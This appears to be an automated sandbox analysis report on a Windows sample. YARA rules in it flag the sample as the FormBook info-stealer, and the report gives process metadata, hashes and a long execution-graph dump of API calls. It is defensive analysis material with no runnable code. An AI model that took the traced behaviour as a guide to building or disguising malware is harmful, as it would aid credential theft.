                                                                  Commandline:"C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe"
                                                                  Imagebase:0x550000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3587672328.0000000005600000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3587672328.0000000005600000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:8
                                                                  Start time:10:46:26
                                                                  Start date:11/10/2024
                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                  Imagebase:0x7ff6bf500000
                                                                  File size:676'768 bytes
                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:3.7%
                                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                                    Signature Coverage:8.1%
                                                                    Total number of Nodes:2000
                                                                    Total number of Limit Nodes:81
                                                                    execution_graph 97029 e61066 97034 e6f8cf 97029->97034 97031 e6106c 97067 e82ec0 97031->97067 97035 e6f8f0 97034->97035 97070 e80083 97035->97070 97039 e6f937 97080 e677c7 97039->97080 97042 e677c7 59 API calls 97043 e6f94b 97042->97043 97044 e677c7 59 API calls 97043->97044 97045 e6f955 97044->97045 97046 e677c7 59 API calls 97045->97046 97047 e6f993 97046->97047 97048 e677c7 59 API calls 97047->97048 97049 e6fa5e 97048->97049 97085 e760e7 97049->97085 97053 e6fa90 97054 e677c7 59 API calls 97053->97054 97055 e6fa9a 97054->97055 97113 e7ff1e 97055->97113 97057 e6fae1 97058 e6faf1 GetStdHandle 97057->97058 97059 e6fb3d 97058->97059 97060 ea4904 97058->97060 97061 e6fb45 OleInitialize 97059->97061 97060->97059 97062 ea490d 97060->97062 97061->97031 97120 ec6be1 64 API calls Mailbox 97062->97120 97064 ea4914 97121 ec72b0 CreateThread 97064->97121 97066 ea4920 CloseHandle 97066->97061 97193 e82dc4 97067->97193 97069 e61076 97122 e8015c 97070->97122 97073 e8015c 59 API calls 97074 e800c5 97073->97074 97075 e677c7 59 API calls 97074->97075 97076 e800d1 97075->97076 97129 e67d2c 97076->97129 97078 e6f8f6 97079 e802e2 6 API calls 97078->97079 97079->97039 97081 e80f36 Mailbox 59 API calls 97080->97081 97082 e677e8 97081->97082 97083 e80f36 Mailbox 59 API calls 97082->97083 97084 e677f6 97083->97084 97084->97042 97086 e677c7 59 API calls 97085->97086 97087 e760f7 97086->97087 97088 e677c7 59 API calls 97087->97088 97089 e760ff 97088->97089 97188 e75bfd 97089->97188 97092 e75bfd 59 API calls 97093 e7610f 97092->97093 97094 e677c7 59 API calls 97093->97094 97095 e7611a 97094->97095 97096 e80f36 Mailbox 59 API calls 97095->97096 97097 e6fa68 97096->97097 97098 e76259 97097->97098 97099 e76267 97098->97099 97100 e677c7 59 API calls 97099->97100 97101 e76272 97100->97101 97102 e677c7 59 API calls 97101->97102 97103 e7627d 97102->97103 97104 e677c7 59 API calls 97103->97104 97105 e76288 97104->97105 97106 e677c7 59 API calls 97105->97106 97107 e76293 97106->97107 97108 e75bfd 59 API calls 97107->97108 97109 e7629e 97108->97109 97110 e80f36 Mailbox 59 API calls 97109->97110 97111 e762a5 RegisterWindowMessageW 97110->97111 97111->97053 97114 e7ff2e 97113->97114 97115 eb5ac5 97113->97115 97116 e80f36 Mailbox 59 API calls 97114->97116 97191 ec9b90 60 API calls 97115->97191 97118 e7ff36 97116->97118 97118->97057 97119 eb5ad0 97120->97064 97121->97066 97192 ec7296 65 API calls 97121->97192 97123 e677c7 59 API calls 97122->97123 97124 e80167 97123->97124 97125 e677c7 59 API calls 97124->97125 97126 e8016f 97125->97126 97127 e677c7 59 API calls 97126->97127 97128 e800bb 97127->97128 97128->97073 97130 e67da5 97129->97130 97131 e67d38 __wsetenvp 97129->97131 97142 e67e8c 97130->97142 97133 e67d73 97131->97133 97134 e67d4e 97131->97134 97139 e68189 97133->97139 97138 e68087 59 API calls Mailbox 97134->97138 97137 e67d56 _memmove 97137->97078 97138->97137 97146 e80f36 97139->97146 97141 e68193 97141->97137 97143 e67ea3 _memmove 97142->97143 97144 e67e9a 97142->97144 97143->97137 97144->97143 97184 e67faf 97144->97184 97149 e80f3e 97146->97149 97148 e80f58 97148->97141 97149->97148 97151 e80f5c std::exception::exception 97149->97151 97156 e8588c 97149->97156 97173 e83521 DecodePointer 97149->97173 97174 e8871b RaiseException 97151->97174 97153 e80f86 97175 e88651 58 API calls _free 97153->97175 97155 e80f98 97155->97141 97157 e85907 97156->97157 97168 e85898 97156->97168 97182 e83521 DecodePointer 97157->97182 97159 e8590d 97183 e88ca8 58 API calls __getptd_noexit 97159->97183 97162 e858cb RtlAllocateHeap 97162->97168 97172 e858ff 97162->97172 97164 e858f3 97180 e88ca8 58 API calls __getptd_noexit 97164->97180 97168->97162 97168->97164 97169 e858f1 97168->97169 97170 e858a3 97168->97170 97179 e83521 DecodePointer 97168->97179 97181 e88ca8 58 API calls __getptd_noexit 97169->97181 97170->97168 97176 e8a2eb 58 API calls __NMSG_WRITE 97170->97176 97177 e8a348 58 API calls 6 library calls 97170->97177 97178 e8321f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97170->97178 97172->97149 97173->97149 97174->97153 97175->97155 97176->97170 97177->97170 97179->97168 97180->97169 97181->97172 97182->97159 97183->97172 97185 e67fc2 97184->97185 97187 e67fbf _memmove 97184->97187 97186 e80f36 Mailbox 59 API calls 97185->97186 97186->97187 97187->97143 97189 e677c7 59 API calls 97188->97189 97190 e75c05 97189->97190 97190->97092 97191->97119 97194 e82dd0 _doexit 97193->97194 97201 e83397 97194->97201 97200 e82df7 _doexit 97200->97069 97218 e89d8b 97201->97218 97203 e82dd9 97204 e82e08 DecodePointer DecodePointer 97203->97204 97205 e82e35 97204->97205 97206 e82de5 97204->97206 97205->97206 97264 e88924 59 API calls __wcsnicmp 97205->97264 97215 e82e02 97206->97215 97208 e82e98 EncodePointer EncodePointer 97208->97206 97209 e82e6c 97209->97206 97213 e82e86 EncodePointer 97209->97213 97266 e889e4 61 API calls 2 library calls 97209->97266 97210 e82e47 97210->97208 97210->97209 97265 e889e4 61 API calls 2 library calls 97210->97265 97213->97208 97214 e82e80 97214->97206 97214->97213 97267 e833a0 97215->97267 97219 e89d9c 97218->97219 97220 e89daf EnterCriticalSection 97218->97220 97225 e89e13 97219->97225 97220->97203 97222 e89da2 97222->97220 97249 e83235 58 API calls 3 library calls 97222->97249 97226 e89e1f _doexit 97225->97226 97227 e89e28 97226->97227 97229 e89e40 97226->97229 97250 e8a2eb 58 API calls __NMSG_WRITE 97227->97250 97236 e89e61 _doexit 97229->97236 97253 e8899d 58 API calls __malloc_crt 97229->97253 97230 e89e2d 97251 e8a348 58 API calls 6 library calls 97230->97251 97232 e89e55 97234 e89e6b 97232->97234 97235 e89e5c 97232->97235 97239 e89d8b __lock 58 API calls 97234->97239 97254 e88ca8 58 API calls __getptd_noexit 97235->97254 97236->97222 97237 e89e34 97252 e8321f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97237->97252 97241 e89e72 97239->97241 97243 e89e7f 97241->97243 97244 e89e97 97241->97244 97255 e89fab InitializeCriticalSectionAndSpinCount 97243->97255 97256 e82ed5 97244->97256 97247 e89e8b 97262 e89eb3 LeaveCriticalSection _doexit 97247->97262 97250->97230 97251->97237 97253->97232 97254->97236 97255->97247 97257 e82ede RtlFreeHeap 97256->97257 97261 e82f07 __dosmaperr 97256->97261 97258 e82ef3 97257->97258 97257->97261 97263 e88ca8 58 API calls __getptd_noexit 97258->97263 97260 e82ef9 GetLastError 97260->97261 97261->97247 97262->97236 97263->97260 97264->97210 97265->97209 97266->97214 97270 e89ef5 LeaveCriticalSection 97267->97270 97269 e82e07 97269->97200 97270->97269 97271 e61016 97276 e64ad2 97271->97276 97274 e82ec0 __cinit 67 API calls 97275 e61025 97274->97275 97277 e80f36 Mailbox 59 API calls 97276->97277 97278 e64ada 97277->97278 97279 e6101b 97278->97279 97283 e64a94 97278->97283 97279->97274 97284 e64aaf 97283->97284 97285 e64a9d 97283->97285 97287 e64afe 97284->97287 97286 e82ec0 __cinit 67 API calls 97285->97286 97286->97284 97288 e677c7 59 API calls 97287->97288 97289 e64b16 GetVersionExW 97288->97289 97290 e67d2c 59 API calls 97289->97290 97291 e64b59 97290->97291 97292 e67e8c 59 API calls 97291->97292 97300 e64b86 97291->97300 97293 e64b7a 97292->97293 97315 e67886 97293->97315 97295 e64bf1 GetCurrentProcess IsWow64Process 97296 e64c0a 97295->97296 97297 e64c20 97296->97297 97298 e64c89 GetSystemInfo 97296->97298 97311 e64c95 97297->97311 97302 e64c56 97298->97302 97299 e9dbbd 97300->97295 97300->97299 97302->97279 97304 e64c32 97306 e64c95 2 API calls 97304->97306 97305 e64c7d GetSystemInfo 97307 e64c47 97305->97307 97308 e64c3a GetNativeSystemInfo 97306->97308 97307->97302 97309 e64c4d FreeLibrary 97307->97309 97308->97307 97309->97302 97312 e64c2e 97311->97312 97313 e64c9e LoadLibraryA 97311->97313 97312->97304 97312->97305 97313->97312 97314 e64caf GetProcAddress 97313->97314 97314->97312 97316 e67894 97315->97316 97317 e67e8c 59 API calls 97316->97317 97318 e678a4 97317->97318 97318->97300 97319 ea44c8 97323 eb625a 97319->97323 97321 ea44d3 97322 eb625a 85 API calls 97321->97322 97322->97321 97324 eb6267 97323->97324 97330 eb6294 97323->97330 97325 eb6296 97324->97325 97327 eb629b 97324->97327 97324->97330 97332 eb628e 97324->97332 97362 e69488 84 API calls Mailbox 97325->97362 97334 e69997 97327->97334 97330->97321 97361 e69700 59 API calls _wcsstr 97332->97361 97335 e699b1 97334->97335 97336 e699ab 97334->97336 97337 e9f92c __i64tow 97335->97337 97338 e699f9 97335->97338 97340 e699b7 __itow 97335->97340 97343 e9f833 97335->97343 97352 e67c8e 97336->97352 97367 e83818 83 API calls 3 library calls 97338->97367 97342 e80f36 Mailbox 59 API calls 97340->97342 97344 e699d1 97342->97344 97345 e9f8ab Mailbox _wcscpy 97343->97345 97346 e80f36 Mailbox 59 API calls 97343->97346 97344->97336 97363 e67f41 97344->97363 97368 e83818 83 API calls 3 library calls 97345->97368 97348 e9f878 97346->97348 97349 e80f36 Mailbox 59 API calls 97348->97349 97350 e9f89e 97349->97350 97350->97345 97351 e67f41 59 API calls 97350->97351 97351->97345 97353 e67ca0 97352->97353 97354 e9efc4 97352->97354 97369 e67bb1 97353->97369 97375 eb7f03 59 API calls _memmove 97354->97375 97357 e67cac 97357->97330 97358 e9efce 97376 e681a7 97358->97376 97360 e9efd6 Mailbox 97361->97330 97362->97327 97364 e67f50 __wsetenvp _memmove 97363->97364 97365 e80f36 Mailbox 59 API calls 97364->97365 97366 e67f8e 97365->97366 97366->97336 97367->97340 97368->97337 97370 e67bbf 97369->97370 97374 e67be5 _memmove 97369->97374 97371 e80f36 Mailbox 59 API calls 97370->97371 97370->97374 97372 e67c34 97371->97372 97373 e80f36 Mailbox 59 API calls 97372->97373 97373->97374 97374->97357 97375->97358 97377 e681b2 97376->97377 97378 e681ba 97376->97378 97380 e680d7 59 API calls 2 library calls 97377->97380 97378->97360 97380->97378 97381 1ab83b8 97395 1ab6008 97381->97395 97383 1ab8473 97398 1ab82a8 97383->97398 97401 1ab9498 GetPEB 97395->97401 97397 1ab6693 97397->97383 97399 1ab82b1 Sleep 97398->97399 97400 1ab82bf 97399->97400 97402 1ab94c2 97401->97402 97402->97397 97403 e61055 97408 e62649 97403->97408 97406 e82ec0 __cinit 67 API calls 97407 e61064 97406->97407 97409 e677c7 59 API calls 97408->97409 97410 e626b7 97409->97410 97415 e63582 97410->97415 97413 e62754 97414 e6105a 97413->97414 97418 e63416 59 API calls 2 library calls 97413->97418 97414->97406 97419 e635b0 97415->97419 97418->97413 97420 e635a1 97419->97420 97421 e635bd 97419->97421 97420->97413 97421->97420 97422 e635c4 RegOpenKeyExW 97421->97422 97422->97420 97423 e635de RegQueryValueExW 97422->97423 97424 e63614 RegCloseKey 97423->97424 97425 e635ff 97423->97425 97424->97420 97425->97424 97426 e63633 97427 e6366a 97426->97427 97428 e636e7 97427->97428 97429 e63688 97427->97429 97465 e636e5 97427->97465 97433 e9d24c 97428->97433 97434 e636ed 97428->97434 97430 e63695 97429->97430 97431 e6375d PostQuitMessage 97429->97431 97435 e9d2bf 97430->97435 97436 e636a0 97430->97436 97468 e636d8 97431->97468 97432 e636ca DefWindowProcW 97432->97468 97476 e711d0 10 API calls Mailbox 97433->97476 97438 e63715 SetTimer RegisterWindowMessageW 97434->97438 97439 e636f2 97434->97439 97491 ec281f 71 API calls _memset 97435->97491 97440 e63767 97436->97440 97441 e636a8 97436->97441 97442 e6373e CreatePopupMenu 97438->97442 97438->97468 97445 e9d1ef 97439->97445 97446 e636f9 KillTimer 97439->97446 97474 e64531 64 API calls _memset 97440->97474 97447 e636b3 97441->97447 97448 e9d2a4 97441->97448 97442->97468 97444 e9d273 97477 e711f3 341 API calls Mailbox 97444->97477 97452 e9d228 MoveWindow 97445->97452 97453 e9d1f4 97445->97453 97471 e644cb Shell_NotifyIconW _memset 97446->97471 97455 e636be 97447->97455 97456 e6374b 97447->97456 97448->97432 97490 eb7f5e 59 API calls Mailbox 97448->97490 97449 e9d2d1 97449->97432 97449->97468 97452->97468 97458 e9d1f8 97453->97458 97459 e9d217 SetFocus 97453->97459 97455->97432 97478 e644cb Shell_NotifyIconW _memset 97455->97478 97473 e645df 81 API calls _memset 97456->97473 97457 e6375b 97457->97468 97458->97455 97463 e9d201 97458->97463 97459->97468 97460 e6370c 97472 e63114 DeleteObject DestroyWindow Mailbox 97460->97472 97475 e711d0 10 API calls Mailbox 97463->97475 97465->97432 97469 e9d298 97479 e643db 97469->97479 97471->97460 97472->97468 97473->97457 97474->97457 97475->97468 97476->97444 97477->97455 97478->97469 97480 e64406 _memset 97479->97480 97492 e64213 97480->97492 97483 e6448b 97485 e644a5 Shell_NotifyIconW 97483->97485 97486 e644c1 Shell_NotifyIconW 97483->97486 97487 e644b3 97485->97487 97486->97487 97496 e6410d 97487->97496 97489 e644ba 97489->97465 97490->97465 97491->97449 97493 e9d568 97492->97493 97494 e64227 97492->97494 97493->97494 97495 e9d571 DestroyIcon 97493->97495 97494->97483 97518 ec302e 62 API calls _W_store_winword 97494->97518 97495->97494 97497 e64200 Mailbox 97496->97497 97498 e64129 97496->97498 97497->97489 97519 e67b76 97498->97519 97501 e64144 97503 e67d2c 59 API calls 97501->97503 97502 e9d50d LoadStringW 97505 e9d527 97502->97505 97504 e64159 97503->97504 97504->97505 97506 e6416a 97504->97506 97507 e67c8e 59 API calls 97505->97507 97508 e64174 97506->97508 97509 e64205 97506->97509 97512 e9d531 97507->97512 97511 e67c8e 59 API calls 97508->97511 97510 e681a7 59 API calls 97509->97510 97515 e6417e _memset _wcscpy 97510->97515 97511->97515 97512->97515 97524 e67e0b 97512->97524 97514 e9d553 97517 e67e0b 59 API calls 97514->97517 97516 e641e6 Shell_NotifyIconW 97515->97516 97516->97497 97517->97515 97518->97483 97520 e80f36 Mailbox 59 API calls 97519->97520 97521 e67b9b 97520->97521 97522 e68189 59 API calls 97521->97522 97523 e64137 97522->97523 97523->97501 97523->97502 97525 e67e1f 97524->97525 97526 e9f0a3 97524->97526 97531 e67db0 97525->97531 97528 e68189 59 API calls 97526->97528 97530 e9f0ae __wsetenvp _memmove 97528->97530 97529 e67e2a 97529->97514 97532 e67dbf __wsetenvp 97531->97532 97533 e67dd0 _memmove 97532->97533 97534 e68189 59 API calls 97532->97534 97533->97529 97535 e9f060 _memmove 97534->97535 97536 e6e5ec 97539 e6ce1a 97536->97539 97538 e6e5f8 97540 e6ce32 97539->97540 97547 e6ce86 97539->97547 97540->97547 97548 e6a000 97540->97548 97543 ea2915 97543->97543 97544 e6ceaf 97544->97538 97545 e6ce69 97545->97544 97571 e69e9c 60 API calls Mailbox 97545->97571 97547->97544 97572 ec9ed4 89 API calls 4 library calls 97547->97572 97549 e6a01f 97548->97549 97565 e6a04d Mailbox 97548->97565 97550 e80f36 Mailbox 59 API calls 97549->97550 97550->97565 97551 e6b5d5 97552 e681a7 59 API calls 97551->97552 97566 e6a1b7 97552->97566 97553 eb71e5 59 API calls 97553->97565 97554 e80f36 59 API calls Mailbox 97554->97565 97557 e82ec0 67 API calls __cinit 97557->97565 97558 e681a7 59 API calls 97558->97565 97559 ea03ae 97575 ec9ed4 89 API calls 4 library calls 97559->97575 97561 e677c7 59 API calls 97561->97565 97564 ea03bd 97564->97545 97565->97551 97565->97553 97565->97554 97565->97557 97565->97558 97565->97559 97565->97561 97565->97566 97567 ea0d2f 97565->97567 97569 e6a6ba 97565->97569 97570 e6b5da 97565->97570 97573 e6ca20 341 API calls 2 library calls 97565->97573 97574 e6ba60 60 API calls Mailbox 97565->97574 97566->97545 97577 ec9ed4 89 API calls 4 library calls 97567->97577 97576 ec9ed4 89 API calls 4 library calls 97569->97576 97578 ec9ed4 89 API calls 4 library calls 97570->97578 97571->97547 97572->97543 97573->97565 97574->97565 97575->97564 97576->97566 97577->97570 97578->97566 97579 ec8db6 97580 ec8dc9 97579->97580 97581 ec8dc3 97579->97581 97583 ec8dda 97580->97583 97584 e82ed5 _free 58 API calls 97580->97584 97582 e82ed5 _free 58 API calls 97581->97582 97582->97580 97585 ec8dec 97583->97585 97586 e82ed5 _free 58 API calls 97583->97586 97584->97583 97586->97585 97587 ea0180 97599 e7fac4 97587->97599 97589 ea0196 97590 ea01ac 97589->97590 97591 ea0217 97589->97591 97688 e69fbd 60 API calls 97590->97688 97608 e6fe40 97591->97608 97595 ea01eb 97598 ea020b Mailbox 97595->97598 97689 ec83f8 59 API calls Mailbox 97595->97689 97596 ea0c10 Mailbox 97598->97596 97690 ec9ed4 89 API calls 4 library calls 97598->97690 97600 e7fae2 97599->97600 97601 e7fad0 97599->97601 97603 e7fb11 97600->97603 97604 e7fae8 97600->97604 97691 e69e9c 60 API calls Mailbox 97601->97691 97692 e69e9c 60 API calls Mailbox 97603->97692 97605 e80f36 Mailbox 59 API calls 97604->97605 97607 e7fada 97605->97607 97607->97589 97693 e682e0 97608->97693 97610 e6fe9d 97611 ea4a86 97610->97611 97657 e70856 97610->97657 97698 e6f394 97610->97698 97792 ec9ed4 89 API calls 4 library calls 97611->97792 97615 ea4a9b 97616 ea4be6 97616->97615 97623 e6ffac 97616->97623 97798 eda3ee 85 API calls Mailbox 97616->97798 97617 e6ff9e 97617->97616 97617->97623 97796 eb6a42 59 API calls 2 library calls 97617->97796 97618 e70677 97627 e80f36 Mailbox 59 API calls 97618->97627 97620 e80f36 59 API calls Mailbox 97650 e6ff33 97620->97650 97622 ea4b30 97622->97615 97794 ec9ed4 89 API calls 4 library calls 97622->97794 97628 ea4c52 97623->97628 97675 ea4eac 97623->97675 97702 e684dc 97623->97702 97624 ea4ba1 97797 eb6363 59 API calls 2 library calls 97624->97797 97637 e706a5 _memmove 97627->97637 97638 ea4c70 97628->97638 97800 e68720 59 API calls Mailbox 97628->97800 97631 ea4aae 97631->97622 97793 e6f803 341 API calls 97631->97793 97633 e70004 97643 ea4e2f 97633->97643 97644 e70092 97633->97644 97681 e702d9 Mailbox _memmove 97633->97681 97634 ea4bc4 97640 e6a000 341 API calls 97634->97640 97635 ea4c0b Mailbox 97635->97623 97799 eb6a42 59 API calls 2 library calls 97635->97799 97645 e80f36 Mailbox 59 API calls 97637->97645 97639 ea4c81 97638->97639 97801 e68720 59 API calls Mailbox 97638->97801 97639->97681 97802 eb631f 59 API calls Mailbox 97639->97802 97640->97616 97811 ec9b90 60 API calls 97643->97811 97647 e80f36 Mailbox 59 API calls 97644->97647 97686 e70266 _memmove 97645->97686 97652 e70099 97647->97652 97650->97615 97650->97617 97650->97618 97650->97620 97650->97631 97650->97637 97651 e6a000 341 API calls 97650->97651 97660 ea4b65 97650->97660 97651->97650 97652->97657 97709 e70b30 97652->97709 97653 ea4da6 97654 e6a000 341 API calls 97653->97654 97656 ea4de0 97654->97656 97656->97615 97806 e68620 97656->97806 97791 ec9ed4 89 API calls 4 library calls 97657->97791 97659 e70112 97659->97637 97659->97657 97666 e70146 97659->97666 97795 ec9ed4 89 API calls 4 library calls 97660->97795 97664 ea4e0b 97810 ec9ed4 89 API calls 4 library calls 97664->97810 97669 e681a7 59 API calls 97666->97669 97673 e70167 97666->97673 97669->97673 97670 e80f36 59 API calls Mailbox 97670->97681 97672 e704f8 97672->97598 97673->97657 97674 ea4e7d 97673->97674 97677 e701ac 97673->97677 97812 e69e9c 60 API calls Mailbox 97674->97812 97675->97615 97813 ec9ed4 89 API calls 4 library calls 97675->97813 97677->97657 97677->97675 97678 e70238 97677->97678 97786 e69e9c 60 API calls Mailbox 97678->97786 97680 ea4d75 97684 e80f36 Mailbox 59 API calls 97680->97684 97681->97653 97681->97657 97681->97664 97681->97670 97681->97672 97681->97680 97788 e688a0 68 API calls __cinit 97681->97788 97789 e687c0 68 API calls 97681->97789 97803 ec59de 68 API calls 97681->97803 97804 e68b13 69 API calls Mailbox 97681->97804 97805 e69e9c 60 API calls Mailbox 97681->97805 97682 e7024b 97682->97657 97787 e6843f 59 API calls Mailbox 97682->97787 97684->97653 97686->97681 97687 e702c2 97686->97687 97790 e69df0 59 API calls Mailbox 97686->97790 97687->97598 97688->97595 97689->97598 97690->97596 97691->97607 97692->97607 97694 e682ef 97693->97694 97697 e6830a 97693->97697 97695 e67faf 59 API calls 97694->97695 97696 e682f7 CharUpperBuffW 97695->97696 97696->97697 97697->97610 97699 e6f3b1 97698->97699 97701 e6f3d2 97699->97701 97814 ec9ed4 89 API calls 4 library calls 97699->97814 97701->97650 97703 e684ed 97702->97703 97704 e9f116 97702->97704 97705 e80f36 Mailbox 59 API calls 97703->97705 97706 e684f4 97705->97706 97707 e68515 97706->97707 97815 e68794 59 API calls Mailbox 97706->97815 97707->97628 97707->97633 97710 ea501c 97709->97710 97721 e70b55 97709->97721 97877 ec9ed4 89 API calls 4 library calls 97710->97877 97712 e70e5a 97712->97659 97714 e71044 97714->97712 97716 e71051 97714->97716 97875 e711f3 341 API calls Mailbox 97716->97875 97717 e70bab PeekMessageW 97785 e70b65 Mailbox 97717->97785 97719 e71058 LockWindowUpdate DestroyWindow GetMessageW 97719->97712 97723 e7108a 97719->97723 97721->97785 97878 e69fbd 60 API calls 97721->97878 97879 eb669f 341 API calls 97721->97879 97722 ea51da Sleep 97722->97785 97726 ea5fb1 TranslateMessage DispatchMessageW GetMessageW 97723->97726 97724 e70e44 97724->97712 97874 e711d0 10 API calls Mailbox 97724->97874 97726->97726 97727 ea5fe1 97726->97727 97727->97712 97728 e71005 TranslateMessage DispatchMessageW 97729 e70fa3 PeekMessageW 97728->97729 97729->97785 97730 ea50a9 TranslateAcceleratorW 97730->97729 97730->97785 97731 e69fbd 60 API calls 97731->97785 97733 e70e73 timeGetTime 97733->97785 97734 ea5b78 WaitForSingleObject 97737 ea5b95 GetExitCodeProcess CloseHandle 97734->97737 97734->97785 97735 e681a7 59 API calls 97735->97785 97736 e677c7 59 API calls 97772 e70fd0 Mailbox 97736->97772 97770 e710f5 97737->97770 97738 e70fbf Sleep 97738->97772 97739 ea5e51 Sleep 97739->97772 97741 e80f36 59 API calls Mailbox 97741->97785 97742 e6b89c 314 API calls 97742->97785 97744 e8034a timeGetTime 97744->97772 97745 e710ae timeGetTime 97876 e69fbd 60 API calls 97745->97876 97748 ea5ee8 GetExitCodeProcess 97750 ea5efe WaitForSingleObject 97748->97750 97751 ea5f14 CloseHandle 97748->97751 97749 e69997 84 API calls 97749->97785 97750->97751 97750->97785 97751->97772 97754 ee5f8e 110 API calls 97754->97772 97755 e6b93d 109 API calls 97755->97772 97756 ea5bcd 97756->97770 97757 ea5f70 Sleep 97757->97785 97758 ea53d1 Sleep 97758->97785 97760 e67f41 59 API calls 97760->97772 97764 e6a000 314 API calls 97764->97785 97767 e6fe40 314 API calls 97767->97785 97769 e67f41 59 API calls 97769->97785 97770->97659 97772->97736 97772->97744 97772->97748 97772->97754 97772->97755 97772->97756 97772->97757 97772->97758 97772->97760 97772->97770 97772->97785 97886 ec2700 60 API calls 97772->97886 97887 e69fbd 60 API calls 97772->97887 97888 e68b13 69 API calls Mailbox 97772->97888 97889 e6b89c 341 API calls 97772->97889 97890 eb6830 60 API calls 97772->97890 97891 ec52eb QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 97772->97891 97892 ec3c99 66 API calls Mailbox 97772->97892 97773 ec9ed4 89 API calls 97773->97785 97775 e68620 69 API calls 97775->97785 97776 e69df0 59 API calls Mailbox 97776->97785 97778 e68b13 69 API calls 97778->97785 97779 ea592e VariantClear 97779->97785 97780 ea59c4 VariantClear 97780->97785 97781 eb71e5 59 API calls 97781->97785 97782 eb63f2 59 API calls Mailbox 97782->97785 97783 e68e34 59 API calls Mailbox 97783->97785 97784 ea5772 VariantClear 97784->97785 97785->97717 97785->97722 97785->97724 97785->97728 97785->97729 97785->97730 97785->97731 97785->97733 97785->97734 97785->97735 97785->97738 97785->97739 97785->97741 97785->97742 97785->97745 97785->97749 97785->97764 97785->97767 97785->97769 97785->97770 97785->97772 97785->97773 97785->97775 97785->97776 97785->97778 97785->97779 97785->97780 97785->97781 97785->97782 97785->97783 97785->97784 97816 e6e580 97785->97816 97823 e6e800 97785->97823 97854 e6f5c0 97785->97854 97873 e631ce IsDialogMessageW GetClassLongW 97785->97873 97880 ee6081 59 API calls 97785->97880 97881 ec9abe 59 API calls Mailbox 97785->97881 97882 ebd801 59 API calls 97785->97882 97883 eb6363 59 API calls 2 library calls 97785->97883 97884 e68561 59 API calls 97785->97884 97885 e6843f 59 API calls Mailbox 97785->97885 97786->97682 97787->97686 97788->97681 97789->97681 97790->97686 97791->97611 97792->97615 97793->97622 97794->97615 97795->97615 97796->97624 97797->97634 97798->97635 97799->97635 97800->97638 97801->97639 97802->97681 97803->97681 97804->97681 97805->97681 97807 e6862b 97806->97807 97808 e68652 97807->97808 98845 e68b13 69 API calls Mailbox 97807->98845 97808->97664 97810->97615 97811->97666 97812->97675 97813->97615 97814->97701 97815->97707 97817 e6e5b1 97816->97817 97818 e6e59d 97816->97818 97894 ec9ed4 89 API calls 4 library calls 97817->97894 97893 e6e060 341 API calls 2 library calls 97818->97893 97820 e6e5a8 97820->97785 97822 ea3dfd 97822->97822 97824 e6e835 97823->97824 97825 ea3e02 97824->97825 97826 e6e89f 97824->97826 97837 e6e8f9 97824->97837 97827 e6a000 341 API calls 97825->97827 97831 e677c7 59 API calls 97826->97831 97826->97837 97828 ea3e17 97827->97828 97853 e6ead0 Mailbox 97828->97853 97896 ec9ed4 89 API calls 4 library calls 97828->97896 97829 e677c7 59 API calls 97829->97837 97832 ea3e5d 97831->97832 97835 e82ec0 __cinit 67 API calls 97832->97835 97833 e82ec0 __cinit 67 API calls 97833->97837 97834 ea3e7f 97834->97785 97835->97837 97836 e68620 69 API calls 97836->97853 97837->97829 97837->97833 97837->97834 97839 e6eaba 97837->97839 97837->97853 97839->97853 97897 ec9ed4 89 API calls 4 library calls 97839->97897 97843 e6f2f5 97901 ec9ed4 89 API calls 4 library calls 97843->97901 97844 e6a000 341 API calls 97844->97853 97845 ea417e 97845->97785 97846 e68ea0 59 API calls 97846->97853 97849 ec9ed4 89 API calls 97849->97853 97852 e6ebd8 97852->97785 97853->97836 97853->97843 97853->97844 97853->97846 97853->97849 97853->97852 97895 e680d7 59 API calls 2 library calls 97853->97895 97898 eb71e5 59 API calls 97853->97898 97899 edc6d7 341 API calls 97853->97899 97900 edb651 341 API calls Mailbox 97853->97900 97902 e69df0 59 API calls Mailbox 97853->97902 97903 ed94db 341 API calls Mailbox 97853->97903 97855 e6f7b0 97854->97855 97856 e6f61a 97854->97856 97857 e67f41 59 API calls 97855->97857 97858 e6f626 97856->97858 97859 ea4777 97856->97859 97865 e6f6ec Mailbox 97857->97865 97993 e6f3f0 341 API calls 2 library calls 97858->97993 97995 edbd80 341 API calls Mailbox 97859->97995 97862 ea4785 97866 e6f790 97862->97866 97996 ec9ed4 89 API calls 4 library calls 97862->97996 97864 e6f65d 97864->97862 97864->97865 97864->97866 97904 ede037 97865->97904 97907 eccc06 97865->97907 97987 ec3c7b 97865->97987 97990 ede04b 97865->97990 97866->97785 97868 e6f743 97868->97866 97994 e69df0 59 API calls Mailbox 97868->97994 97873->97785 97874->97714 97875->97719 97876->97785 97877->97721 97878->97721 97879->97721 97880->97785 97881->97785 97882->97785 97883->97785 97884->97785 97885->97785 97886->97772 97887->97772 97888->97772 97889->97772 97890->97772 97891->97772 97892->97772 97893->97820 97894->97822 97895->97853 97896->97853 97897->97853 97898->97853 97899->97853 97900->97853 97901->97845 97902->97853 97903->97853 97997 edcbf1 97904->97997 97906 ede047 97906->97868 97908 e677c7 59 API calls 97907->97908 97909 eccc3b 97908->97909 97910 e677c7 59 API calls 97909->97910 97911 eccc44 97910->97911 97912 eccc58 97911->97912 98309 e69c9c 59 API calls 